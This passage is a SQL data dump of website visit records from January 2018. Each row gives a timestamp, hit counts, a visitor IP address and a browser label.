,1,1,0,0,'40.77.167.46','other'),(198840,1516122169,1,1,0,0,'54.36.148.168','other'),(198841,1516122894,1,1,0,0,'176.107.123.11','firefox'),(198842,1516123120,1,1,0,0,'157.55.39.252','other'),(198843,1516123168,1,1,0,0,'217.69.133.18','other'),(198844,1516123656,1,1,0,0,'77.52.180.238','chrome'),(198845,1516123884,1,1,0,0,'91.196.178.94','firefox'),(198846,1516123953,1,1,0,0,'188.230.43.254','other'),(198847,1516123987,1,1,0,0,'178.154.171.88','other'),(198848,1516124245,1,0,1,0,'66.249.64.30',''),(198849,1516124476,1,1,0,0,'54.36.148.129','other'),(198850,1516124618,1,1,0,0,'66.249.64.30','chrome'),(198851,1516124893,1,1,0,0,'178.154.171.88','other'),(198852,1516125263,1,1,0,0,'78.111.185.227','chrome'),(198853,1516125442,4,4,0,0,'216.244.66.246','other'),(198854,1516125505,1,1,0,0,'217.69.133.10','other'),(198855,1516125648,4,4,0,0,'216.244.66.194','other'),(198856,1516125840,1,1,0,0,'54.36.148.233','other'),(198857,1516126334,1,1,0,0,'188.230.43.254','other'),(198858,1516126380,1,1,0,0,'66.249.64.157','chrome'),(198859,1516126501,1,1,0,0,'54.36.149.26','other'),(198860,1516126669,1,1,0,0,'217.69.133.13','other'),(198861,1516126864,1,1,0,0,'54.36.148.202','other'),(198862,1516126926,1,1,0,0,'54.36.148.79','other'),(198863,1516126956,1,1,0,0,'91.209.11.236','other'),(198864,1516127307,1,1,0,0,'216.244.66.246','other'),(198865,1516127933,1,1,0,0,'40.77.167.64','other'),(198866,1516128407,1,1,0,0,'91.196.178.166','chrome'),(198867,1516128753,1,1,0,0,'46.211.115.84','other'),(198868,1516129108,1,1,0,0,'54.36.148.61','other'),(198869,1516129645,1,1,0,0,'54.36.148.244','other'),(198870,1516129931,1,1,0,0,'54.36.149.62','other'),(198871,1516130027,1,1,0,0,'37.73.221.164','chrome'),(198872,1516130050,1,0,1,0,'66.249.64.29',''),(198873,1516130400,1,1,0,0,'54.36.148.60','other'),(198874,1516131128,1,1,0,0,'8.29.198.26','other'),(198875,1516131331,1,1,0,0,'87.244.171.109','chrome'),(198876,1516131596,3,3,0,0,'216.244.66.194','other'),(198877,1516131674,1,1,0,0,'157.55.39.252','other'),(198878,1516132091,1,1,0,0,'40.77.167.46','other'),(198879,1516132364,1,1,0,0,'54.36.148.111','other'),(198880,1516132429,1,1,0,0,'54.36.148.177','other'),(198881,1516132954,1,1,0,0,'51.255.71.117','other'),(198882,1516133238,1,1,0,0,'54.36.148.52','other'),(198883,1516133481,1,1,0,0,'54.36.148.91','other'),(198884,1516133690,1,1,0,0,'51.255.71.121','other'),(198885,1516133963,1,1,0,0,'176.107.123.11','firefox'),(198886,1516134068,1,1,0,0,'82.193.115.183','chrome'),(198887,1516134358,1,1,0,0,'46.211.25.53','chrome'),(198888,1516134404,1,1,0,0,'51.255.71.113','other'),(198889,1516134426,2,2,0,0,'144.76.8.231','other'),(198890,1516134428,1,1,0,0,'91.196.178.79','chrome'),(198891,1516134450,1,1,0,0,'54.36.149.96','other'),(198892,1516134521,1,1,0,0,'95.28.162.238','msie'),(198893,1516134816,1,1,0,0,'54.36.149.63','other'),(198894,1516134817,1,0,1,0,'66.249.64.16',''),(198895,1516134888,1,1,0,0,'54.36.148.234','other'),(198896,1516135315,3,3,0,0,'5.9.144.234','other'),(198897,1516135402,1,1,0,0,'91.211.132.11','chrome'),(198898,1516135591,3,3,0,0,'216.244.66.246','other'),(198899,1516135740,2,2,0,0,'216.244.66.194','other'),(198900,1516135829,1,1,0,0,'54.36.148.65','other'),(198901,1516136209,1,1,0,0,'54.36.148.208','other'),(198902,1516136661,1,1,0,0,'54.36.149.44','other'),(198903,1516136702,1,1,0,0,'46.200.126.154','firefox'),(198904,1516136824,1,1,0,0,'51.255.71.122','other'),(198905,1516137207,1,1,0,0,'107.167.106.109','other'),(198906,1516137715,1,1,0,0,'159.89.28.108','other'),(198907,1516139499,1,1,0,0,'51.15.63.43','other'),(198908,1516139580,1,1,0,0,'37.220.35.58','opera'),(198909,1516139690,1,1,0,0,'217.69.133.229','other'),(198910,1516139863,1,1,0,0,'217.69.133.233','other'),(198911,1516140429,1,1,0,0,'54.36.149.70','other'),(198912,1516140826,1,1,0,0,'54.36.148.134','other'),(198913,1516141574,1,1,0,0,'51.255.71.126','other'),(198914,1516141614,1,1,0,0,'54.36.148.122','other'),(198915,1516141629,1,1,0,0,'54.36.149.23','other'),(198916,1516141971,1,1,0,0,'8.29.198.27','other'),(198917,1516142282,1,1,0,0,'216.244.66.194','other'),(198918,1516143119,1,0,1,0,'66.249.64.30',''),(198919,1516143245,1,1,0,0,'217.69.133.12','other'),(198920,1516145040,1,1,0,0,'54.36.149.63','other'),(198921,1516145233,1,1,0,0,'54.36.148.176','other'),(198922,1516145890,1,1,0,0,'216.244.66.194','other'),(198923,1516147122,1,0,1,0,'66.249.64.30',''),(198924,1516147291,1,1,0,0,'54.36.148.205','other'),(198925,1516147345,1,1,0,0,'54.36.148.190','other'),(198926,1516147430,1,1,0,0,'54.36.148.99','other'),(198927,1516147556,1,1,0,0,'54.36.148.18','other'),(198928,1516147701,1,1,0,0,'54.36.149.90','other'),(198929,1516147951,1,1,0,0,'217.69.133.192','other'),(198930,1516148686,1,0,1,0,'66.249.64.157',''),(198931,1516148778,1,1,0,0,'46.48.13.161','chrome'),(198932,1516149248,1,1,0,0,'54.36.148.204','other'),(198933,1516149568,1,1,0,0,'54.36.148.147','other'),(198934,1516149819,1,1,0,0,'54.36.148.63','other'),(198935,1516150142,1,1,0,0,'51.255.71.131','other'),(198936,1516150191,2,2,0,0,'216.244.66.246','other'),(198937,1516150987,1,1,0,0,'54.36.148.168','other'),(198938,1516151300,1,1,0,0,'216.244.66.237','other'),(198939,1516152237,1,1,0,0,'54.36.149.31','other'),(198940,1516152813,1,1,0,0,'8.29.198.27','other'),(198941,1516153621,1,1,0,0,'54.36.148.153','other'),(198942,1516153849,1,1,0,0,'40.77.167.46','other'),(198943,1516153881,1,1,0,0,'54.36.148.75','other'),(198944,1516154263,1,1,0,0,'54.36.149.34','other'),(198945,1516154730,1,1,0,0,'54.36.148.66','other'),(198946,1516155050,1,1,0,0,'54.36.148.122','other'),(198947,1516156073,1,0,1,0,'66.249.64.30',''),(198948,1516156222,1,1,0,0,'74.115.214.157','other'),(198949,1516156392,1,1,0,0,'216.244.66.194','other'),(198950,1516156405,2,2,0,0,'216.244.66.246','other'),(198951,1516157857,1,1,0,0,'54.36.149.32','other'),(198952,1516158079,1,1,0,0,'54.36.148.80','other'),(198953,1516158624,1,1,0,0,'54.36.148.49','other'),(198954,1516158892,1,1,0,0,'54.36.149.84','other'),(198955,1516158952,1,1,0,0,'54.36.149.46','other'),(198956,1516159715,1,1,0,0,'54.36.149.13','other'),(198957,1516159988,1,1,0,0,'54.36.148.234','other'),(198958,1516160096,1,1,0,0,'78.154.167.247','chrome'),(198959,1516160273,1,1,0,0,'54.36.149.29','other'),(198960,1516160425,1,1,0,0,'66.249.64.157','chrome'),(198961,1516160928,3,3,0,0,'216.244.66.246','other'),(198962,1516160953,1,1,0,0,'40.77.167.46','other'),(198963,1516161454,1,1,0,0,'51.255.71.130','other'),(198964,1516161582,1,1,0,0,'54.36.148.57','other'),(198965,1516161994,3,3,0,0,'216.244.66.194','other'),(198966,1516162178,1,0,1,0,'66.249.64.28',''),(198967,1516162435,1,1,0,0,'54.36.149.1','other'),(198968,1516162538,1,1,0,0,'207.46.13.51','other'),(198969,1516163005,1,1,0,0,'176.15.231.136','chrome'),(198970,1516163349,1,0,1,0,'66.249.64.28',''),(198971,1516163643,1,1,0,0,'8.29.198.26','other'),(198972,1516164054,1,1,0,0,'54.36.148.204','other'),(198973,1516164170,1,1,0,0,'40.77.167.86','other'),(198974,1516165131,1,1,0,0,'54.36.149.45','other'),(198975,1516165156,1,1,0,0,'54.36.148.132','other'),(198976,1516165233,1,0,1,0,'66.249.64.28',''),(198977,1516165469,1,1,0,0,'216.244.66.246','other'),(198978,1516165817,1,1,0,0,'54.36.148.245','other'),(198979,1516166294,2,2,0,0,'216.244.66.194','other'),(198980,1516166430,1,1,0,0,'54.36.148.71','other'),(198981,1516166505,1,1,0,0,'54.36.149.47','other'),(198982,1516167550,1,1,0,0,'51.255.71.125','other'),(198983,1516167682,1,1,0,0,'54.36.148.101','other'),(198984,1516167700,1,1,0,0,'66.249.70.27','chrome'),(198985,1516167819,1,1,0,0,'54.36.148.150','other'),(198986,1516168713,1,1,0,0,'54.36.149.12','other'),(198987,1516168945,1,1,0,0,'54.36.148.199','other'),(198988,1516169225,1,1,0,0,'54.36.149.23','other'),(198989,1516169514,1,1,0,0,'207.46.13.51','other'),(198990,1516169696,1,1,0,0,'51.255.71.133','other'),(198991,1516169782,1,1,0,0,'217.69.133.70','other'),(198992,1516170552,20,20,0,0,'69.30.205.218','other'),(198993,1516170603,1,1,0,0,'207.46.13.43','other'),(198994,1516170651,1,1,0,0,'91.196.178.84','chrome'),(198995,1516170674,1,1,0,0,'54.36.148.69','other'),(198996,1516170832,1,1,0,0,'93.75.86.108','chrome'),(198997,1516170843,1,1,0,0,'74.115.214.137','other'),(198998,1516170844,1,1,0,0,'74.115.214.134','other'),(198999,1516171280,1,1,0,0,'66.249.64.30','chrome'),(199000,1516171402,1,1,0,0,'66.249.70.29','chrome'),(199001,1516171512,1,1,0,0,'216.244.66.246','other'),(199002,1516172170,2,2,0,0,'216.244.66.194','other'),(199003,1516172263,1,1,0,0,'54.36.148.125','other'),(199004,1516172363,1,1,0,0,'91.196.178.36','chrome'),(199005,1516173099,1,1,0,0,'54.36.148.50','other'),(199006,1516173128,1,1,0,0,'66.249.70.29','chrome'),(199007,1516173133,1,1,0,0,'91.196.178.35','chrome'),(199008,1516173234,1,1,0,0,'45.55.32.122','chrome'),(199009,1516173306,2,2,0,0,'37.53.243.129','firefox'),(199010,1516173371,1,1,0,0,'91.196.178.72','chrome'),(199011,1516173435,1,1,0,0,'91.196.178.162','chrome'),(199012,1516173689,1,1,0,0,'91.196.178.84','chrome'),(199013,1516173725,1,1,0,0,'188.230.43.254','other'),(199014,1516173985,1,1,0,0,'141.8.142.74','other'),(199015,1516174181,1,1,0,0,'54.36.148.154','other'),(199016,1516174257,1,1,0,0,'216.244.66.246','other'),(199017,1516174470,1,1,0,0,'37.73.227.48','chrome'),(199018,1516174482,1,1,0,0,'8.29.198.25','other'),(199019,1516174484,1,1,0,0,'195.230.119.34','chrome'),(199020,1516174667,1,1,0,0,'54.36.149.94','other'),(199021,1516174739,1,1,0,0,'37.73.228.88','chrome'),(199022,1516175196,1,1,0,0,'54.36.148.166','other'),(199023,1516175231,1,1,0,0,'91.196.178.84','chrome'),(199024,1516175507,1,1,0,0,'91.124.239.227','firefox'),(199025,1516175790,1,1,0,0,'54.36.148.13','other'),(199026,1516175878,1,1,0,0,'31.43.142.6','chrome'),(199027,1516176066,1,1,0,0,'54.36.149.23','other'),(199028,1516176201,2,2,0,0,'216.244.66.194','other'),(199029,1516176941,1,1,0,0,'178.94.173.156','chrome'),(199030,1516177570,1,1,0,0,'54.36.148.95','other'),(199031,1516177618,1,1,0,0,'40.77.167.46','other'),(199032,1516177708,1,1,0,0,'54.36.148.84','other'),(199033,1516177885,1,1,0,0,'94.178.117.126','firefox'),(199034,1516178178,1,1,0,0,'207.46.13.51','other'),(199035,1516178341,1,1,0,0,'54.36.148.232','other'),(199036,1516178626,1,1,0,0,'54.36.149.13','other'),(199037,1516179061,1,1,0,0,'217.69.133.203','other'),(199038,1516179093,1,1,0,0,'195.54.42.20','chrome'),(199039,1516179151,1,0,1,0,'66.249.64.28',''),(199040,1516179563,1,1,0,0,'91.196.178.72','firefox'),(199041,1516180009,1,1,0,0,'54.36.148.186','other'),(199042,1516181141,1,1,0,0,'66.249.64.30','chrome'),(199043,1516181177,1,1,0,0,'54.36.149.103','other'),(199044,1516181193,1,1,0,0,'54.36.148.167','other'),(199045,1516181902,1,1,0,0,'54.36.148.233','other'),(199046,1516182228,2,2,0,0,'216.244.66.246','other'),(199047,1516182282,1,1,0,0,'194.187.216.114','chrome'),(199048,1516182293,2,2,0,0,'216.244.66.194','other'),(199049,1516182549,1,1,0,0,'54.36.148.252','other'),(199050,1516183458,1,1,0,0,'54.36.149.7','other'),(199051,1516183863,1,1,0,0,'78.111.189.17','chrome'),(199052,1516183954,2,2,0,0,'188.191.237.86','firefox'),(199053,1516184139,1,1,0,0,'141.8.142.74','other'),(199054,1516184211,1,1,0,0,'128.72.76.67','msie'),(199055,1516184300,1,1,0,0,'91.196.177.15','chrome'),(199056,1516184581,2,2,0,0,'216.244.66.246','other'),(199057,1516184611,1,1,0,0,'54.36.148.196','other'),(199058,1516184884,1,1,0,0,'54.36.148.56','other'),(199059,1516185099,1,1,0,0,'141.8.142.74','other'),(199060,1516185314,1,1,0,0,'8.29.198.27','other'),(199061,1516185858,1,1,0,0,'54.36.148.121','other'),(199062,1516185907,1,1,0,0,'37.55.237.253','chrome'),(199063,1516185987,1,1,0,0,'54.36.148.36','other'),(199064,1516186414,2,2,0,0,'176.98.69.250','chrome'),(199065,1516186798,1,1,0,0,'54.36.148.188','other'),(199066,1516186873,1,1,0,0,'91.196.178.72','firefox'),(199067,1516187068,1,1,0,0,'141.8.142.74','other'),(199068,1516187145,6,6,0,0,'216.244.66.194','other'),(199069,1516187171,1,1,0,0,'54.36.149.4','other'),(199070,1516187312,2,2,0,0,'37.52.47.49','chrome'),(199071,1516189051,1,1,0,0,'54.36.149.1','other'),(199072,1516189255,1,1,0,0,'217.69.136.207','other'),(199073,1516189455,1,1,0,0,'54.36.148.15','other'),(199074,1516189578,1,1,0,0,'54.36.148.108','other'),(199075,1516189785,1,1,0,0,'54.36.148.82','other'),(199076,1516190318,1,0,1,0,'66.249.64.29',''),(199077,1516190468,1,1,0,0,'93.185.213.56','chrome'),(199078,1516190879,1,1,0,0,'66.249.70.25','chrome'),(199079,1516190989,1,1,0,0,'95.132.18.56','chrome'),(199080,1516191122,1,1,0,0,'178.154.171.88','other'),(199081,1516191368,1,1,0,0,'91.196.178.84','chrome'),(199082,1516191508,1,1,0,0,'13.56.229.65','chrome'),(199083,1516192034,1,1,0,0,'54.36.148.20','other'),(199084,1516192217,1,1,0,0,'54.36.148.56','other'),(199085,1516192427,1,1,0,0,'178.154.171.88','other'),(199086,1516192478,1,1,0,0,'91.211.132.60','chrome'),(199087,1516192533,1,1,0,0,'216.244.66.194','other'),(199088,1516192684,2,2,0,0,'216.244.66.246','other'),(199089,1516192883,1,0,1,0,'66.249.64.30',''),(199090,1516193074,1,0,1,0,'66.249.70.29',''),(199091,1516193250,1,1,0,0,'213.108.45.138','chrome'),(199092,1516193427,1,1,0,0,'91.196.178.84','chrome'),(199093,1516193719,1,1,0,0,'93.185.217.105','chrome'),(199094,1516193853,1,1,0,0,'91.239.241.9','chrome'),(199095,1516194388,1,1,0,0,'54.36.149.2','other'),(199096,1516194475,1,0,1,0,'66.249.70.25',''),(199097,1516194703,1,1,0,0,'66.249.70.29','chrome'),(199098,1516194913,1,1,0,0,'188.230.43.254','other'),(199099,1516194968,1,1,0,0,'54.36.148.14','other'),(199100,1516195411,1,1,0,0,'31.45.226.49','chrome'),(199101,1516195616,1,1,0,0,'54.36.148.62','other'),(199102,1516195793,1,1,0,0,'95.132.39.232','firefox'),(199103,1516195807,1,1,0,0,'54.36.149.107','other'),(199104,1516195979,1,1,0,0,'54.36.149.44','other'),(199105,1516196120,1,1,0,0,'91.196.178.84','chrome'),(199106,1516196148,1,1,0,0,'8.29.198.26','other'),(199107,1516196244,2,2,0,0,'95.134.51.124','firefox'),(199108,1516196321,1,1,0,0,'162.210.196.130','other'),(199109,1516196435,1,1,0,0,'91.196.178.130','firefox'),(199110,1516196547,1,1,0,0,'40.77.167.86','other'),(199111,1516196696,2,2,0,0,'216.244.66.246','other'),(199112,1516197297,1,1,0,0,'188.230.43.254','other'),(199113,1516198011,2,2,0,0,'216.244.66.194','other'),(199114,1516198056,1,1,0,0,'91.196.178.163','chrome'),(199115,1516198071,1,1,0,0,'54.36.148.134','other'),(199116,1516198368,1,1,0,0,'66.249.70.29','chrome'),(199117,1516198663,1,1,0,0,'91.196.178.84','chrome'),(199118,1516199019,1,1,0,0,'54.36.148.153','other'),(199119,1516199393,1,0,1,0,'66.249.64.28',''),(199120,1516199828,1,1,0,0,'54.36.149.61','other'),(199121,1516200027,1,1,0,0,'141.8.142.74','other'),(199122,1516200077,1,1,0,0,'176.120.38.254','chrome'),(199123,1516200249,1,1,0,0,'54.36.148.49','other'),(199124,1516200777,1,1,0,0,'5.9.156.74','other'),(199125,1516201358,1,1,0,0,'54.36.149.7','other'),(199126,1516201669,1,1,0,0,'91.196.179.25','chrome'),(199127,1516201785,1,1,0,0,'91.196.178.84','chrome'),(199128,1516201888,1,1,0,0,'91.196.178.92','firefox'),(199129,1516201904,1,1,0,0,'66.249.70.25','chrome'),(199130,1516201919,1,1,0,0,'91.196.178.166','chrome'),(199131,1516202021,1,1,0,0,'54.36.148.122','other'),(199132,1516202548,1,1,0,0,'217.69.133.9','other'),(199133,1516202642,1,1,0,0,'217.69.134.183','other'),(199134,1516202835,1,1,0,0,'188.230.43.254','other'),(199135,1516202900,4,4,0,0,'216.244.66.246','other'),(199136,1516202962,1,1,0,0,'54.36.148.193','other'),(199137,1516203116,2,2,0,0,'216.244.66.194','other'),(199138,1516203886,1,1,0,0,'54.36.149.74','other'),(199139,1516204323,1,1,0,0,'54.36.149.39','other'),(199140,1516205292,1,1,0,0,'54.36.148.112','other'),(199141,1516205340,2,2,0,0,'93.72.4.209','chrome'),(199142,1516205450,1,0,1,0,'66.249.70.25',''),(199143,1516205477,1,1,0,0,'54.36.149.5','other'),(199144,1516205586,1,1,0,0,'54.36.149.34','other'),(199145,1516205599,1,1,0,0,'54.36.148.208','other'),(199146,1516205682,1,0,1,0,'66.249.70.27',''),(199147,1516206003,1,1,0,0,'54.36.148.167','other'),(199148,1516206118,1,1,0,0,'54.36.149.18','other'),(199149,1516206180,1,1,0,0,'54.36.148.41','other'),(199150,1516206280,1,1,0,0,'77.111.244.59','chrome'),(199151,1516206536,1,1,0,0,'54.36.149.55','other'),(199152,1516206605,1,1,0,0,'54.36.148.43','other'),(199153,1516206740,1,1,0,0,'207.46.13.89','other'),(199154,1516206744,1,1,0,0,'141.8.142.74','other'),(199155,1516206895,1,1,0,0,'51.255.71.119','other'),(199156,1516206996,1,1,0,0,'8.29.198.26','other'),(199157,1516207055,1,1,0,0,'194.187.170.134','other'),(199158,1516207073,1,1,0,0,'54.36.148.50','other'),(199159,1516207521,1,1,0,0,'54.36.148.108','other'),(199160,1516207553,3,3,0,0,'216.244.66.246','other'),(199161,1516207558,1,1,0,0,'54.36.148.254','other'),(199162,1516208000,1,1,0,0,'54.36.149.60','other'),(199163,1516208562,1,1,0,0,'188.230.43.254','other'),(199164,1516208839,2,2,0,0,'216.244.66.194','other'),(199165,1516209396,1,1,0,0,'54.36.149.32','other'),(199166,1516209591,1,1,0,0,'54.36.148.68','other'),(199167,1516209941,1,1,0,0,'141.8.142.74','other'),(199168,1516210785,1,1,0,0,'51.255.71.133','other'),(199169,1516210976,1,1,0,0,'188.230.43.254','other'),(199170,1516211075,1,1,0,0,'54.36.149.90','other'),(199171,1516211337,1,1,0,0,'92.113.189.211','chrome'),(199172,1516211721,1,1,0,0,'54.36.148.94','other'),(199173,1516212344,2,2,0,0,'216.244.66.246','other'),(199174,1516212577,1,1,0,0,'54.36.148.84','other'),(199175,1516212660,1,1,0,0,'54.36.148.49','other'),(199176,1516212842,1,1,0,0,'207.46.13.51','other'),(199177,1516212916,1,1,0,0,'66.249.70.25','chrome'),(199178,1516213240,1,1,0,0,'54.36.148.186','other'),(199179,1516213365,1,1,0,0,'188.230.43.254','other'),(199180,1516213736,1,1,0,0,'216.244.66.194','other'),(199181,1516213889,1,1,0,0,'54.36.148.121','other'),(199182,1516214418,2,2,0,0,'136.243.73.76','other'),(199183,1516214501,1,1,0,0,'54.36.148.110','other'),(199184,1516214639,1,1,0,0,'54.36.148.141','other'),(199185,1516214804,1,1,0,0,'54.36.148.22','other'),(199186,1516215219,1,1,0,0,'54.36.149.6','other'),(199187,1516215268,1,1,0,0,'54.36.148.36','other'),(199188,1516215769,1,1,0,0,'188.230.43.254','other'),(199189,1516215940,1,1,0,0,'54.36.148.240','other'),(199190,1516216223,1,1,0,0,'54.36.148.98','other'),(199191,1516216371,1,1,0,0,'54.36.149.88','other'),(199192,1516216496,1,1,0,0,'66.249.70.29','chrome'),(199193,1516216571,1,1,0,0,'66.249.64.29','chrome'),(199194,1516216700,1,1,0,0,'54.36.148.15','other'),(199195,1516216726,1,1,0,0,'54.36.149.52','other'),(199196,1516217211,1,1,0,0,'54.36.149.100','other'),(199197,1516217263,1,1,0,0,'54.36.148.235','other'),(199198,1516217450,1,1,0,0,'54.36.149.58','other'),(199199,1516217837,1,1,0,0,'8.29.198.26','other'),(199200,1516217883,1,1,0,0,'54.36.148.129','other'),(199201,1516218166,1,1,0,0,'188.230.43.254','other'),(199202,1516218402,1,1,0,0,'91.196.178.65','chrome'),(199203,1516218545,5,5,0,0,'216.244.66.246','other'),(199204,1516218640,1,1,0,0,'51.255.71.119','other'),(199205,1516219618,1,1,0,0,'54.36.148.111','other'),(199206,1516219620,1,1,0,0,'188.130.176.3','chrome'),(199207,1516219624,1,1,0,0,'54.36.149.105','other'),(199208,1516219775,1,1,0,0,'54.36.148.165','other'),(199209,1516220085,1,1,0,0,'54.36.148.13','other'),(199210,1516220351,1,1,0,0,'54.36.149.51','other'),(199211,1516220419,1,1,0,0,'207.46.13.89','other'),(199212,1516220562,1,1,0,0,'188.230.43.254','other'),(199213,1516221058,1,0,1,0,'66.249.64.16',''),(199214,1516221235,1,1,0,0,'46.118.140.84','msie'),(199215,1516221283,2,2,0,0,'216.244.66.246','other'),(199216,1516222061,1,1,0,0,'141.8.132.19','other'),(199217,1516222697,1,1,0,0,'54.36.148.197','other'),(199218,1516223134,1,1,0,0,'54.36.149.11','other'),(199219,1516224650,3,3,0,0,'216.244.66.194','other'),(199220,1516225268,1,1,0,0,'5.53.116.121','chrome'),(199221,1516226154,1,1,0,0,'54.36.149.3','other'),(199222,1516226722,1,1,0,0,'54.36.148.157','other'),(199223,1516226802,1,1,0,0,'54.36.149.43','other'),(199224,1516226807,1,1,0,0,'193.194.127.111','chrome'),(199225,1516227217,1,1,0,0,'54.36.149.5','other'),(199226,1516227374,1,1,0,0,'141.8.142.74','other'),(199227,1516227792,1,1,0,0,'54.36.149.30','other'),(199228,1516227966,1,1,0,0,'54.36.148.185','other'),(199229,1516228222,1,1,0,0,'54.36.149.36','other'),(199230,1516228312,1,1,0,0,'107.21.1.8','other'),(199231,1516228675,1,1,0,0,'8.29.198.27','other'),(199232,1516229023,1,0,1,0,'66.249.64.29',''),(199233,1516229512,4,4,0,0,'216.244.66.246','other'),(199234,1516229641,3,3,0,0,'216.244.66.194','other'),(199235,1516229844,1,1,0,0,'54.36.149.84','other'),(199236,1516230403,1,1,0,0,'35.225.221.87','other'),(199237,1516230448,1,1,0,0,'54.36.148.189','other'),(199238,1516230466,1,1,0,0,'54.36.148.73','other'),(199239,1516230972,1,1,0,0,'54.36.148.146','other'),(199240,1516231031,1,1,0,0,'54.36.148.23','other'),(199241,1516231112,1,1,0,0,'54.36.148.197','other'),(199242,1516231413,1,1,0,0,'54.36.148.242','other'),(199243,1516231416,2,2,0,0,'54.36.149.81','other'),(199244,1516231544,1,1,0,0,'54.36.148.155','other'),(199245,1516232480,2,2,0,0,'216.244.66.246','other'),(199246,1516232489,1,1,0,0,'66.249.64.28','chrome'),(199247,1516233093,1,1,0,0,'54.36.148.27','other'),(199248,1516233346,1,1,0,0,'54.36.149.6','other'),(199249,1516233647,1,1,0,0,'141.8.142.74','other'),(199250,1516233651,1,1,0,0,'178.154.171.88','other'),(199251,1516234324,1,1,0,0,'54.36.148.31','other'),(199252,1516234392,1,1,0,0,'37.144.50.38','msie'),(199253,1516234441,1,1,0,0,'54.36.148.204','other'),(199254,1516234664,1,1,0,0,'54.36.148.235','other'),(199255,1516234733,4,4,0,0,'216.244.66.194','other'),(199256,1516234792,1,1,0,0,'54.36.148.161','other'),(199257,1516235084,1,1,0,0,'54.36.148.113','other'),(199258,1516235442,1,1,0,0,'34.207.57.252','other'),(199259,1516235836,1,1,0,0,'54.36.148.163','other'),(199260,1516236131,1,1,0,0,'54.36.149.107','other'),(199261,1516236217,1,1,0,0,'54.36.148.180','other'),(199262,1516236798,1,1,0,0,'54.36.148.124','other'),(199263,1516236861,3,3,0,0,'46.4.87.205','other'),(199264,1516237696,1,1,0,0,'54.36.148.178','other'),(199265,1516238286,1,1,0,0,'104.196.166.58','other'),(199266,1516239062,1,1,0,0,'66.249.64.29','chrome'),(199267,1516239509,1,1,0,0,'8.29.198.27','other'),(199268,1516239766,2,2,0,0,'216.244.66.194','other'),(199269,1516239794,1,1,0,0,'54.36.149.68','other'),(199270,1516239812,4,4,0,0,'216.244.66.246','other'),(199271,1516241273,1,1,0,0,'51.255.71.133','other'),(199272,1516241933,1,1,0,0,'54.36.148.252','other'),(199273,1516242223,1,1,0,0,'51.255.71.127','other'),(199274,1516242272,1,1,0,0,'54.36.148.21','other'),(199275,1516243115,1,1,0,0,'54.36.149.52','other'),(199276,1516243200,1,1,0,0,'54.36.148.99','other'),(199277,1516243722,1,1,0,0,'141.8.142.74','other'),(199278,1516243803,1,1,0,0,'216.244.66.246','other'),(199279,1516244192,1,1,0,0,'54.36.148.113','other'),(199280,1516244471,1,1,0,0,'54.36.148.21','other'),(199281,1516244475,1,1,0,0,'54.36.148.24','other'),(199282,1516244569,1,1,0,0,'54.36.149.107','other'),(199283,1516245183,1,1,0,0,'216.244.66.194','other'),(199284,1516245781,1,1,0,0,'54.36.149.40','other'),(199285,1516246845,1,1,0,0,'54.36.148.244','other'),(199286,1516246935,1,1,0,0,'54.36.148.30','other'),(199287,1516246996,1,1,0,0,'207.46.13.10','other'),(199288,1516247176,1,1,0,0,'54.36.148.120','other'),(199289,1516247544,1,1,0,0,'54.36.148.136','other'),(199290,1516248000,1,1,0,0,'54.36.148.142','other'),(199291,1516248077,1,1,0,0,'146.0.231.218','chrome'),(199292,1516248323,1,1,0,0,'54.36.148.196','other'),(199293,1516248510,1,1,0,0,'207.46.13.7','other'),(199294,1516248876,1,0,1,0,'66.249.64.28',''),(199295,1516249402,1,1,0,0,'54.36.148.167','other'),(199296,1516249426,1,1,0,0,'54.36.148.11','other'),(199297,1516249454,4,4,0,0,'216.244.66.246','other'),(199298,1516249861,1,1,0,0,'141.8.142.74','other'),(199299,1516249998,4,4,0,0,'216.244.66.194','other'),(199300,1516250359,1,1,0,0,'8.29.198.26','other'),(199301,1516250625,1,1,0,0,'91.209.11.236','other'),(199302,1516251069,1,0,1,0,'66.249.70.29',''),(199303,1516251085,1,1,0,0,'54.36.148.10','other'),(199304,1516251104,1,1,0,0,'207.46.13.10','other'),(199305,1516251326,1,1,0,0,'54.36.148.183','other'),(199306,1516251954,1,1,0,0,'37.72.175.114','other'),(199307,1516251982,1,1,0,0,'54.36.148.80','other'),(199308,1516252628,52,52,0,0,'173.208.128.34','other'),(199309,1516253111,1,1,0,0,'54.36.148.141','other'),(199310,1516253146,1,1,0,0,'54.36.149.45','other'),(199311,1516253374,1,1,0,0,'91.196.178.129','chrome'),(199312,1516253490,1,1,0,0,'54.36.148.99','other'),(199313,1516253738,1,1,0,0,'54.36.148.155','other'),(199314,1516253793,1,1,0,0,'51.255.71.129','other'),(199315,1516253918,1,1,0,0,'176.8.40.185','chrome'),(199316,1516253949,1,1,0,0,'51.255.71.117','other'),(199317,1516254148,1,1,0,0,'54.36.149.103','other'),(199318,1516254231,3,3,0,0,'78.158.28.10','other'),(199319,1516254322,1,1,0,0,'54.36.148.115','other'),(199320,1516254370,1,1,0,0,'54.36.148.33','other'),(199321,1516254492,1,1,0,0,'54.36.148.157','other'),(199322,1516254519,1,1,0,0,'207.46.13.9','other'),(199323,1516254829,6,6,0,0,'216.244.66.194','other'),(199324,1516254838,1,1,0,0,'216.244.66.246','other'),(199325,1516255548,1,1,0,0,'157.55.39.218','other'),(199326,1516255768,1,0,1,0,'66.249.70.25',''),(199327,1516257258,2,2,0,0,'91.196.178.162','chrome'),(199328,1516257354,1,1,0,0,'207.46.13.10','other'),(199329,1516257443,1,1,0,0,'91.124.82.56','chrome'),(199330,1516258223,1,1,0,0,'185.149.23.164','chrome'),(199331,1516258382,1,1,0,0,'91.209.11.236','other'),(199332,1516258644,1,1,0,0,'91.196.178.162','chrome'),(199333,1516259325,1,1,0,0,'157.55.39.218','other'),(199334,1516259986,1,1,0,0,'46.174.163.134','chrome'),(199335,1516260828,1,1,0,0,'91.196.178.86','chrome'),(199336,1516260847,1,1,0,0,'46.200.155.27','chrome'),(199337,1516261077,1,1,0,0,'91.213.33.62','chrome'),(199338,1516261115,1,1,0,0,'185.149.23.164','chrome'),(199339,1516261197,1,1,0,0,'8.29.198.26','other'),(199340,1516262018,4,4,0,0,'216.244.66.194','other'),(199341,1516262350,1,1,0,0,'91.196.179.134','chrome'),(199342,1516262776,1,1,0,0,'207.46.13.9','other'),(199343,1516263008,1,1,0,0,'188.230.43.254','other'),(199344,1516263077,1,1,0,0,'95.132.39.232','firefox'),(199345,1516263219,1,1,0,0,'62.210.103.36','other'),(199346,1516263530,1,1,0,0,'91.196.178.162','chrome'),(199347,1516264047,1,1,0,0,'91.209.11.236','other'),(199348,1516264652,1,1,0,0,'37.73.192.27','chrome'),(199349,1516264835,1,1,0,0,'91.196.177.110','chr